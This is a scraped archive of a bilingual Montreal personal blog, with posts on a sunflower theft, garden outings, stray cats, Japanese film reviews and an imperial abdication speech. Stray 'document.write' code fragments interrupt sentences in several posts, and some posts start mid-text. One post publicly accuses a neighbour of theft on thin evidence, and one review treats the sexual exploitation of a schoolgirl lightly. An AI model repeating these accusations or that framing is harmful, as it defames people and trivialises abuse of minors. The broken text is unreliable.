The Sunflower case / L’affaire tournesol

Following “The sunflower thief”, this video shows security footage of the thief coming back the very next night (2018/07/14, 3:02 am) to steal more sunflowers! Two days in a row! What a real scoundrel! Nobody respects anything anymore, that’s sickening! [ la version française suit ]

This time, I noticed the rascal seems to have a slight beard and a man bun (also he sometimes walks funny). If you know this scumbag, please contact me or the police (a police report has already been filed at station 30 — although the clerk didn’t seem enthusiastic). The varmint is plaguing the whole neighbourhood and I am not the only victim (as seen on the video; I also heard some neighbours complained about it). This type of theft / vandalizing of our property (flower or vegetable gardens) MUST NOT be tolerated no matter how small it may seem! I also think I might have localized the bastard: a neighbour looks A LOT like him; more so he had yesterday a sunflower in his backyard in a pot that looked quite familiar and a few more pots and sunflowers appeared today… Citizens of the neighbourhood, lets act to protect not only our properties but also the greenery that embellishes our environment!

Disparu ! / Gone!

Cette fois, j’ai remarqué que le voyou semble avoir une légère barbe et un chignon (il a aussi une démarche bizarre). Si vous connaissez ce salaud, veuillez communiquer avec moi ou avec la police (un rapport de police a déjà été déposé au poste 30 — bien que le greffier n’ait pas semblé enthousiaste). Cette vermine sévit dans tout le quartier et je ne suis pas la seule victime (comme on peut le voir sur la vidéo, j’ai aussi entendu des voisins s’en plaindre). Ce type de vol / vandalisme de notre propriété (jardins de fleurs ou de légumes) NE DOIT PAS être toléré, peu importe son importance! Je pense aussi avoir localiser l’ostie d’BS: un voisin lui ressemble beaucoup; de plus il avait hier un tournesol dans sa cour arrière dans un pot qui avait l’air assez familier et quelques pots et des tournesols de plus sont apparus aujourd’hui … Citoyens du quartier, agissons pour protéger non seulement nos propriétés mais aussi la verdure qui embellie notre environment!

Sunflower theft / Tournesol volé

My wife finds solace in gardening. Last night (2018/07/13, 2:42 am), some miscreant stole her first blooming sunflower of the year from our front yard in St-Michel borough. It was about 1.3m / 50″ tall, in a 25cm / 10″ green pot. The suspect looks like a white male, skinny and medium height, smoker, waring baseball cap and shorts. If you have any information please contact me. It’s really a shame! People nowadays definitely have no scruples!

Ma femme trouve du réconfort dans le jardinage. La nuit dernière (2018/07/13, 2:42 am), un scélérat a volé son premier tournesol à fleurir cette année dans notre cour avant de l’arrondissement St-Michel. Il mesurait environ 1,3 m / 50 po de hauteur, dans un pot vert de 25 cm / 10 po. Le suspect ressemble à un homme blanc, mince et  de grandeur moyenne, fumeur, portant une casquette et un short. Si vous avez des informations s’il vous plaît me contactez. C’est vraiment une honte! Les gens de nos jours  n’ont décidément plus aucun scrupules!

Customer service is dead!

It seems that wherever we go these days companies don’t care about customer service. Either they have a quasi monopole and it’s irrelevant or, despite a competitive environment, nobody seems to pay attention to the need or satisfaction of the customer. It must be really bad in my area — or I am a VERY unlucky customer — because I keep having those horrible experiences with customer service.

Beside the notoriously bad customer service of telecom companies like Bell (about which I have talked many times — their Fibe TV is superb but their wi-fi is quite shitty and their tech service doesn’t seem to care — unless they can sell you extra service or device that supposedly would improve the situation) I can easily mention three or four companies that gave me bad service just in the last couple of weeks!

Début juin au jardin botanique

Hier après-midi s’est avéré la journée idéale pour aller faire notre première promenade de l’année au jardin botanique. L’objectif était de visiter la roseraie, le “monumental Dougherty” et un pâturage de moutons dans l’arboretum [voir le plan]. On pourra toujours revenir pour voir le reste.

Malheureusement, il était un peu trop tôt pour les roses car la plupart des parterres n’offraient encore que des rosiers sans fleurs. Toutefois, il y en avait assez d’écloses pour que l’on puisse dire avoir pris le temps de sentir les roses… (mais elles n’étaient pas toujours bien identifiées)

Sur le chemin de l’arboretum, nous sommes passé par le jardin japonais et nous nous sommes, bien sûr, arrêté au Pavillon Japonais où se tenait une exposition sur la ville de Hiroshima (jumelée à Montréal). On y présente, malheureusement trop brièvement, la vie quotidienne dans cette ville, plus de soixante-dix ans après l’infâme bombardement.

On fois dans l’arboretum, qui occupe toute la moitié supérieure du jardin botanique, nous n’avons pas tardé à découvrir le monumental Dougherty (dont il ne reste plus apparemment que deux des trois composantes). Il s’agit de deux sculptures végétales monumentales créées en 2017 par Patrick Dougherty et composées de tiges de saule tressées. L’une est intitulée “Architectural Folly” (Havre de fantaisie) et l’autre “Celtic Knot” (Dédale étonnant). C’est à la fois beau et fascinant…

Tout près de là, nos pas nous ont amené au jardin Leslie-Hancock où nous avons découvert une explosion de rhododendrons et d’azalées (i.e. des Éricacées). C’est très beau mais, ma foi, très mal identifié. Dans cette pléthore de couleurs, il devient difficile de savoir qui est quoi et surtout lesquels sont des rhododendrons et lesquels sont des azalées. Ces termes semblent interchangeables mais apparemment l’azalée est un rhododendron “à feuilles caduques ou semi-persistantes portant des fleurs à cinq étamines” alors que «rhododendron» “désigne habituellement [ceux] possédant des feuilles persistantes ainsi que des fleurs à 10 étamines ou plus.”

Après avoir escaladé un petit promontoire, nous nous sommes retrouvé dans ce qui pourrait être l’alpage gazonné de l’arboretum… où broutaient deux moutons! (barres-toi de mon herbe, humain! Je me serais cru dans Le Génie des Alpages de F’Murr!). Un peu plus loin, une bergères gardait un oeil attentif sur son menu troupeau tout en discutant avec les passants fascinés. Sous l’ombrage d’un arbre, une demi-douzaine d’autres moutons se reposaient. J’étais comblé! Il s’agit de «Biquette à Montréal», un projet d’éco-pâturage en collaboration avec le Laboratoire d’agriculture urbaine (AU/LAB). Du 15 mai au 2 juillet, neuf moutons broutent au jardin botanique de 10 à 19 heures.

C’est relaxant de regarder un mouton brouter! (Mais ne vous endormez pas…)

Finalement, notre randonné a culminée à la maison de l’arbre Frédérick-Back où nous avons visité une exposition d’arbres miniatures nord-américains. Au delà de l’étang, nous avons pic-niqué dans un magnifique petit gazebo et observé des oiseaux…

Élagage: suite et fin

Au début de décembre j’ai du écrire à la mairie d’arrondissement car je tentais sans succès depuis le début de l’été de faire élaguer un arbre dont une branche s’appuyait dangereusement sur le fil électrique.

Et bien, c’est maintenant fait. Les élagueurs sont venu faire le travail ce matin. Voir les commentaires du billet original pour les détails sur le déroulement des travaux…

Alita: Battle Angel trailer

James Cameron had been talking about this project for a long time and now it seems that it is finally a reality! Cameron is writing and producing; Robert Rodriguez (Sin City) is directing. The cast includes Rosa Salazar (Alita), Christoph Waltz, Jennifer Connelly, Mahershala Ali, Ed Skrein, Jackie Earle Haley, and Keean Johnson. It is scheduled for release on July 20, 2018. The teaser/trailer is available now on Youtube:

It is, of course, based on Yukito Kishiro’s manga Gunnm (銃夢 / Ganmu / lit. “gun dream”) which was translated in America as Battle Angel Alita. It was originally published in Japan by Shueisha in Business Jump magazine between 1990 and 1995, and was compiled in nine tankōbon (but republished later by Kodansha). The English version is published by Kodansha USA and the French version by Glénat. There was an animation adaptation in 1993.

Interesting facts: Cameron was first inspired by the manga when he created the TV series Dark Angel in 2000. Also, it seems that the main character will be entirely CGI animated and that Rosa Salazar is playing the role through motion-capture.

It looks quite interesting and visually faithful to the original. I can’t wait to see it and hope I won’t be disappointed.

Backyard cleanup !

This is a (silent) time-lapse video filmed on October 1st and 2nd 2017 showing our fall backyard cleanup (again, thanks to Nest Cam). In preparation for major renovations in the backyard, it needed to be cleared. So we took all the flower pots to the front yard, trimmed the old vine, removed the overgrown morning glory and cut the rasberry stems. The next day, we also trimmed the tree, cleaned up the deck and removed the water hose. Here you have about eight hours of work in just three minute !

Italian Week 2017

Today we visited the 2017 Montreal’s Italian Week that was held from August 4 to 13 in the Little Italy. Amongst other things, we’ve seen a Fiat and Ferrari car exposition, a colourful parade and listen to some folkloric music! The parade was organized by one of the multiple Italian associations of Montreal,  from Sicily (probably the Associazione messinese di Montreal). I have also discovered quite an interesting musical instrument: the bufù (a.k.a. caccavella or putipù) is a friction drum that is played by rubbing a bamboo stick through an animal skin membrane to make it vibrate and produce a deep sound. The music was played by the people from the Associazione Casacalendese di Montreal.

Cats stories

A large part of my ten-day vacation was about taking care of the cat problem (which I alluded to in a recent “notable news” post). Just for the fun of it, yesterday I edited a short video showing the extent of the problem. They are cute but that many cats is just too much. Now that they are captured, we just have to find them new families where they can have a happy and meaningful life. That’s the hard part since, as I said, our only official option is the Berger Blanc (and it’s quite frustrating that the city bylaws threaten us of fines for having stray cats CHOOSING our backyard but doesn’t offer any help whatsoever; we’re on our own [link, Gazette, CTV, Animosource]). Hopefully, we’ll find someone to adopt them, maybe some refuge willing to take them or find a way to deal with the SPCA. Anyone interested?

Monthly notable news (W53-03)

The Holidays and the couple of weeks that followed were rather quiet. Thankfully, document.write(“”); I had to deal with much less craziness at work. But that was only the eye of the storm and those depressing days (scientifically certified as such since Blue Monday fell on January 16th this year) are coming to an end. The days are getting longer and more shit will soon hit the fan. Of course, there’s also this endless American nightmare with everything Trump. I wish I could forget about all that and never hear about it again, but unfortunately that’s what the world has become now.

I am already getting behind in my writings, but I caught up a little with my TV and movie watching. Besides the restarting new seasons (mostly Call The Midwife, Colony, Endeavour, Father Brown, Homeland), the notable new additions are Victoria and Dark Angel (although those two have already ended) as well as the weird Young Pope (a young and reckless leader is unexpectedly elected to head the Church — a little reminescent of the whole “orange is the new black” American electoral fiasco — but it’s directed by Paolo Sorrentino, who gave us La grande bellezza) and the quite interesting Mercy Street, a medical period drama set at the Mansion House Hospital during the American Civil War.

I’ll try to reinvent myself this year (so much to do) and push forward even harder on the path to improve my temperament and expend my knowledge. That’s the only purpose one can have.

While watching the news on
NHK World earlier today, document.write(“”); I saw a report on a new anime movie that sounds quite interesting. Based on a manga by Fumiyo K?no, this historical animated drama tells the daily life of young newly wed Suzu in the Japanese countryside of Kure during the years leading to WWII.

Opening of the 33rd JFFM

As I mentioned before, document.write(“”); the 33rd Japanese Film Festival of Montreal was held at the Cinémathèque Québécoise on October 27th and 29th. This free annual event is co-organized by the Japan Foundation (Toronto) and the Consulate General of Japan in Montreal.

Before the screening of the first movie, A Tale of Samurai Cooking, the attendees were treated with a few canapé and a degustation of sake. There was a presentation by the a staff member of the Japanese consulate in Montreal, followed by allocutions of the Cinémathèque general director, Marcel Jean, and the Consul General in Montreal, Hideaki KURAMITSU.

This movie is based on a josei yonkoma (4-panel comic strip aimed at an adult female readership) by Miri Masuda. This style of comic is very popular in Japan. S?-chan “follows the daily lives of women who deal with their anxieties regarding love and work”. It is published by Gentosha and “has sold over 280,000 copies” (up to March 2013). Four volumes have been released between April 2006 and November 2012 (the first volume came out in paperback in August 2009; a preview of the first six pages is available online — opposite: pp. 4-5). The movie adaptation, titled Sue, Mai & Sawa: Righting the Girl Ship, is a typical Japanese feel-good movie. However, despite the light tone, it seriously tackles the anxieties of Japanese single women. It tells the story of three women in their thirties who find themselves questioning their life situation and how they more or less succeed to find happiness.

Yoshiko Morimoto, nicknamed Sue-chan, is 34-year-old and works in a coffee shop where she can put to use her talent for cooking. She has feeling for the manager, but her hesitation prompts a younger, more aggressive colleague to secure his love before she can do anything. However, the owner ends up offering her the manager position. She’s insecure at first and makes mistake, but she slowly grows into the responsibility. She has good wisdom and is a great help to confort and give advise to her friends.

Maiko Okamura, nicknamed Mai-chan, is a 34-year-old office lady working in the sales department of an OA manufacturing company. She is stressed by the pressure at work and frustrated with the fact that her affair with a married man is going nowhere. When her dermatologist suggests that she should give up on some of her life’s problems, she decides to dump her boyfriend and registers with a marriage agency. One year later, she is married and pregnant. However, she worries that motherhood would change her, but finally learns to say goodbye to the woman she was and accepts whom she has become.

Sawako Hayashi, nicknamed Sawa-san, is a 39-year-old web designer. She helps her mother take care of the grandmother who’s bedridden and suffers from dementia. She worries that if she ever marry she would leave her mother to do the care-giving by herself. She meet by chance a former classmate and starts going out with him, but when he appears more concerned with having a descendance and requests a “fertility certificate”, she gets angry and dumps him. She comes to term with having to take care of her grandmother.

The movie feels a little like a sketch comedy in the beginning, but it quickly gets structured into a more uniform storytelling. It might have been intentional, in order to allude to the original 4-panel format which is, by definition, a series of short stories ending with a punch. Food is also a recurring theme in the movie (and a theme shared by all three movies screened at the festival this year) as the friends always gathered around a meal to discuss their problems. But since Ozu it seems that food and meals has been a frequent theme in Japanese movies.

All in all, Sue, Mai & Sawa is an interesting movie that provide some reflection about life and a good entertainment.

Toulouse-Lautrec: Affiche la Belle Époque

Mercredi après le travail je me suis dépêché d’aller visiter l’exposition sur les affiches de Toulouse-Lautrec au Musée des Beaux-Arts de Montréal qui se termine dimanche.

“Cette exposition présente une collection particulière d’exception qui comprend plus de quatre-vingt-dix estampes et affiches, document.write(“”); couvrant presque toute la période de la production lithographique de Toulouse-Lautrec, de 1891 (…) à 1899.”

Même si on y retrouve que les affiches de Toulouse-Lautrec (pas de peintures), c’est tout de même très intéressant. Lautrec était vraiment un illustrateur de talent. Toutefois, c’est une petite exposition qui ne comprend que quelques salles et j’en ai donc fait le tour assez rapidement (en un peu plus d’une heure). Comme à mon habitude, j’ai photographié les pièces de l’exposition qui m’interpellaient le plus afin de garder un petit souvenir de ma visite.

In his second-ever televised speech to the nation, document.write(“”); the
Emperor of Japan (now 82-year-old) announced that his age makes it difficult to perform his duties in a satisfactory manner, hinting that he would wish to abdicate his ceremonial role in favor of the Crown Prince (his son Naruhito).

He addressed his concern directly to the Japanese people because his symbolic role prevents him to intervene in the political system (meaning he cannot ask the Prime Minister or the Diet) and the Constitution does not include any provision in case of abdication. He is concerned that his diminished capacity could affect the Nation and doesn’t want his death (as well as all required mourning and passation of power rituals) to burden his successor. I guess he is also afraid that any (constitutional) talks of abdication could bring up the delicate subject of the relevance of the Imperial system. He seems to think that a gradual succession through a Regency would be the best solution.

A major milestone year marking the 70th anniversary of the end of World War II has passed, and in two years we will be welcoming the 30th year of Heisei.

As I am now more than 80 years old and there are times when I feel various constraints such as in my physical fitness, in the last few years I have started to reflect on my years as the Emperor, and contemplate on my role and my duties as the Emperor in the days to come.

As we are in the midst of a rapidly aging society, I would like to talk to you today about what would be a desirable role of the Emperor in a time when the Emperor, too, becomes advanced in age. While, being in the position of the Emperor, I must refrain from making any specific comments on the existing Imperial system, I would like to tell you what I, as an individual, have been thinking about.

Ever since my accession to the throne, I have carried out the acts of the Emperor in matters of state, and at the same time I have spent my days searching for and contemplating on what is the desirable role of the Emperor, who is designated to be the symbol of the State by the Constitution of Japan. As one who has inherited a long tradition, I have always felt a deep sense of responsibility to protect this tradition. At the same time, in a nation and in a world which are constantly changing, I have continued to think to this day about how the Japanese Imperial Family can put its traditions to good use in the present age and be an active and inherent part of society, responding to the expectations of the people.

It was some years ago, after my two surgeries that I began to feel a decline in my fitness level because of my advancing age, and I started to think about the pending future, how I should conduct myself should it become difficult for me to carry out my heavy duties in the way I have been doing, and what would be best for the country, for the people, and also for the Imperial Family members who will follow after me. I am already 80 years old, and fortunately I am now in good health. However, when I consider that my fitness level is gradually declining, I am worried that it may become difficult for me to carry out my duties as the symbol of the State with my whole being as I have done until now.

I ascended to the throne approximately 28 years ago, and during these years, I have spent my days together with the people of Japan, sharing much of the joys as well as the sorrows that have happened in our country. I have considered that the first and foremost duty of the Emperor is to pray for peace and happiness of all the people. At the same time, I also believe that in some cases it is essential to stand by the people, listen to their voices, and be close to them in their thoughts. In order to carry out the duties of the Emperor as the symbol of the State and as a symbol of the unity of the people, the Emperor needs to seek from the people their understanding on the role of the symbol of the State. I think that likewise, there is need for the Emperor to have a deep awareness of his own role as the Emperor, deep understanding of the people, and willingness to nurture within himself the awareness of being with the people. In this regard, I have felt that my travels to various places throughout Japan, in particular, to remote places and islands, are important acts of the Emperor as the symbol of the State and I have carried them out in that spirit. In my travels throughout the country, which I have made together with the Empress, including the time when I was Crown Prince, I was made aware that wherever I went there were thousands of citizens who love their local community and with quiet dedication continue to support their community. With this awareness I was able to carry out the most important duties of the Emperor, to always think of the people and pray for the people, with deep respect and love for the people. That, I feel, has been a great blessing.

In coping with the aging of the Emperor, I think it is not possible to continue reducing perpetually the Emperor’s acts in matters of state and his duties as the symbol of the State. A Regency may be established to act in the place of the Emperor when the Emperor cannot fulfill his duties for reasons such as he is not yet of age or he is seriously ill. Even in such cases, however, it does not change the fact that the Emperor continues to be the Emperor till the end of his life, even though he is unable to fully carry out his duties as the Emperor.

When the Emperor has ill health and his condition becomes serious, I am concerned that, as we have seen in the past, society comes to a standstill and people’s lives are impacted in various ways. The practice in the Imperial Family has been that the death of the Emperor called for events of heavy mourning, continuing every day for two months, followed by funeral events which continue for one year. These various events occur simultaneously with events related to the new era, placing a very heavy strain on those involved in the events, in particular, the family left behind. It occurs to me from time to time to wonder whether it is possible to prevent such a situation.

As I said in the beginning, under the Constitution, the Emperor does not have powers related to government. Even under such circumstances, it is my hope that by thoroughly reflecting on our country’s long history of emperors, the Imperial Family can continue to be with the people at all times and can work together with the people to build the future of our country, and that the duties of the Emperor as the symbol of the State can continue steadily without a break. With this earnest wish, I have decided to make my thoughts known.

Still, the fact that he hasn’t been able to finish his script and find funding for his project nags him enormously. He is a filmmaker not a schoolteacher… Then, on the street, he runs into a striking young high school girl and his life changes. Not necessarily for the better. He is immediately smitten with Ritsuko. He begins to stalk her. He becomes delusional. His life itself becomes a film. And its ending has not been written.”

I enjoyed this movie (what’s not to like with a movie with lots of beautiful nudity?) but it’s a little hard to talk about it. I’ll do my best. The story is relatively simple and yet rather complex altogether. However, it’s always interesting when movie makers turn the camera on themselves.

Movie director Tokita (Eiji Okuda) is teaching at a film school in Kyoto. He has a rather good life with his mistress Yui, a secretary at the film school, but he would rather be making movies than teaching about them. However, he has not been able to finish a script in a while. He says that, as long as he is thinking about a script, he can still feel he is a director. He is currently working on a pinku eiga script largely inspired by his relationship with Yui.

Tokita is in his sixties and can hardly get an erection, particularly when he’s drunk, but it only makes him more obsess with sex. The title of the movie refers to the “Akadama” legend saying that a blood bead will come out to mark the very last ejaculation of a man.

One day, he notices a high school girl and starts following her, stalking her and becomes obsess by her. He imagines having an affair with her, rapping her even, but he is stuck and doesn’t know how to end his story. At some point, he discovers that the school girl prostitutes herself (she’s charging $700!). He succumbs to the temptation and sleeps with her, but feels disgusted with himself afterward. Seeing his increasing obsession for Ritsuko while typing the script, Yui decides to leave Tokita.

Tokita feels desperate but succeed to finish the script anyway and presents it to a production company which doesn’t sound very receptive. He pleads that it would be his last movie, and ask to please give him a chance! Tokita gets drunk but, as he receives an email from the production company saying that they agree to finance his movie on some conditions, he gets hit by a car and dies!

Once again we have here a movie that tackles the subject of the increasingly older population of Japan which reflects a serious preoccupation among the population. This time we are presented with the despair that sexual frustration and the worth of one’s legacy can provide to an elderly man.

Director Banmei Takahashi, who is himself not unfamiliar with pinku eiga, said in the Q&A that he thought young directors were not putting enough sex in their movies and he wanted to remedy that. He also said that he killed the main character at the end because one of his friends died that way and he wanted to make an homage to him.

During the course of the movie we follow both Tokita’s life, the story of his script as well as his own fantasies, and this makes it rather difficult sometimes to discern which is what. However, it is a good and interesting movie — albeit a little weird — that offers a reflection not only on Japanese cinema but also on the life of elderly men. And, of course, there’s plenty of sex scenes!

“Akane, document.write(“”); a young woman who lives in a small rural town in Japan, loses her mother when she is a child, and cannot overcome the loss. Akane’s father had left her mother’s side before she passed away because he went to perform kagura, a traditional ritual dance at Japanese festivals. Akane has never forgiven him and seldom talks to him. Not that he doesn’t regret his action. He too was deeply affected by his wife’s death and he never performed kagura again. Akane leaves home after high school graduation, and starts a new life far away in Tokyo. But life in the big city is overwhelming and Akane returns home after five years. Thirteen years after her mother’s death, Akane’s father has decided to come out of retirement, just to be able to dance in the big 60th anniversary festival. But he has aged. This movie is very Japanese: it is beautiful and slow paced. It’s a rather complex story and the festival’s program did a very good job at summarizing it, so I won’t say more about it. It’s set around a rural ritual where one danse to please the gods in order to get a good harvest, but it’s a story about grief, about caring for elderly parents, and a little about domestic violence. It poses a very fundamental question about modern life in Japan: is it better to preserve the tradition as it always was or should we adapt it to modern life and therefore preserve the tradition spirit rather than its strict form?

Exceptionally, this movie was subtitled in french (which is rather rare at the MWFF as it is done mostly for the movies in competition) but, unfortunately, this time the subtitling was full of mistakes. Bad translation and spelling mistakes can be quite distracting from the movie itself. The translation was probably done hastily to present the movie at the festival.

All in all, it remains a beautiful movie (Japan’s countryside is always pleasant to look at) about the trials of life.

C’est d’ailleurs le premier vidéo que j’ai filmé avec la Nikon D3300 (en utilisant l’objectif Tamron AF70-300mm F/4-5.6). iMovie offre des fonctions amusantes mais qui malheureusement manquent un peu de flexibilité… Mais, document.write(“”); bon, le résultat est quand même pas trop pire.

La sous-traitance au travail

Lundi dernier je me lève et constate que mon bac de recyclage a disparu! J’arpente la rue de haut en bas dans l’espoir de le retrouver (des fois que les employés du recyclage l’ai laissé plutôt en face de chez les voisins ou que des jeunes espiègles soient parti avec pour faire une blague ou qu’un automobiliste mécontent qu’il ait été laissé dans le milieu du chemin l’ait poussé plus loin). Toutefois,  je n’en ai trouvé aucune trace.

Ce n’est qu’après avoir visionné l’enregistrement vidéo des caméras de sécurité que j’ai compris ce qui s’était passé : l’employé de la firme de recyclage a secoué le bac un peu trop violemment et le couvercle s’est arraché. Faisant ni un ni deux, l’employé dissimule son méfait en embarquant simplement le bac et l’écrasant dans le broyeur de son camion! Ce qui m’embête c’est que l’employé a fait ça tout naturellement et n’a laissé aucune indication de l’incident. Si je n’avais pas eu de caméra de sécurité (et une voisine fouinarde), je n’aurais jamais su ce qui s’était passé.

Et quel gaspillage! Même endommagé il aurait pu me laisser le bac pour que j’ai de quoi accumuler mon recyclage en attendant d’en obtenir un nouveau. Un couvercle ça peut toujours se réparer (ne serait-ce que temporairement), non?

J’ai vraiment besoin d’avoir un bac de recyclage car c’est justement le temps du ménage du printemps (d’autant plus que je me prépare à faire quelques petites rénovations et il me faut faire du ménage pour faire de la place)! Dans ces circonstances, nos deux unités de logement produisent beaucoup de recyclage et je ne tiens pas à m’enterrer dans les sacs transparents — que je déteste d’ailleurs car, comme je demeure près du parc, ceux-ci sont souvent pris à parti par tout les ratons-laveurs, moufettes, écureuils, chats et chiens du quartier, sans oublier les humains en quête de contenants consignés. Les sacs ainsi éventrés répandent alors leur contenu aux quatre vents!

Bien entendu, j’ai appelé l’arrondissement, d’une part, pour me plaindre du méfait de l’employé et, d’autre part, pour obtenir un bac de remplacement le plus vite possible. Malheureusement, la ville semble peu se soucier du comportement de ses sous-traitants. Et les bacs sont présentement en rupture de stock, alors je n’aurai pas de bac de remplacement avant un mois ou deux! Et on ne pouvait même pas me fournir des sacs transparents pour le recyclage: je dois les acheter moi-même!

Je me retrouve dans cette situation par aucune faute de ma part alors je crois que l’arrondissement devrait faire un effort pour me fournir un bac rapidement! Que l’on me donne celui du maire, ou du pauvre gars qui a bousillé le mien ou, encore mieux, l’un des démonstrateurs qui ne foutent rien dans le halle du bureau Accès-Montréal!

Ce genre d’incident démontre encore une fois l’ineptie de la sous-traitance à outrance (Villeray-Saint-Michel-Parc-Extension semble être des champions dans ce domaine) et le fait que la ville se souci peu d’offrir un bon service à ses citoyens. Les exemples de négligences sont nombreux. Un caniveau près de l’arrêt de l’autobus 67-nord de la station Saint-Michel est enfoncé et bouché ce qui fait que lorsqu’il y a accumulation d’eau l’autobus éclabousse inévitablement les usagers qui attendent et cela depuis près d’un an! Sur ma rue il y a au moins deux bornes fontaines qui sont hors d’usage depuis plusieurs années! Ce genre de situation devrait être inacceptable. Et pourtant… Où vont donc nos taxes?

J’ai vu des urubu

Cet après-midi, document.write(“”); en faisant mon six kilomètres de marche de santé autour du Complexe Environnemental Saint-Michel, j’ai pu observer un groupe de cinq rapaces qui jouaient dans le vent, sans doute à l’affut de proies faciles. C’était tout près du quartier général du Cirque du Soleil, dans un beau ciel bleu ponctué de quelques nuages… Malheureusement, je n’avais pas ma caméra avec moi. Seulement mon iPhone 6s, qui demeure tout de même la meilleur caméra à avoir sur soi en tout temps.

C’était des oiseaux avec une grande envergure d’aile (au moins deux pieds, deux pieds et demi, peut-être plus), des ailes pointues et un bec crochu blanc de rapace. La couleur était sombre et le dessous des ailes vers l’arrière était plus clair. À cause de la couleur sombre, ça ne ressemblait pas aux rapaces
que j’avais déjà observé (du genre épervier ou faucon) mais avec cette description, et leur allure en vol, je crois bien que c’était des urubu à tête rouge (Cathares aura; quoi que, vu la distance, je n’ai pas remarqué la tête rouge et chauve qui les caractérise — d’où le nom anglais de Turkey vulture). Ils sont apparement fréquemment observé l’été dans la région de Montréal.

Il s’agit d’un oiseau de proie de la famille des vautours (Cathartidae). Toutefois, selon certains, “l’urubu à tête rouge n’est plus considéré comme appartenant au groupe des oiseaux de proie, mais est désormais classé dans celui des grands échassiers, tels que les hérons et les cigognes, les Ciconiiformes.” Je ne suis pas sûr, mais ils semblent nicher dans l’une des falaises du CESM.

Dans l’Azur – un haiku video

Après quelques mois, document.write(“”); de nombreuses tentatives infructueuses (et de longues attentes sur les quais), j’ai finalement réussi à apercevoir l’oiseau rare et à faire une petite promenade dans l’Azur. Cela m’a inspiré ce petit haiku video!
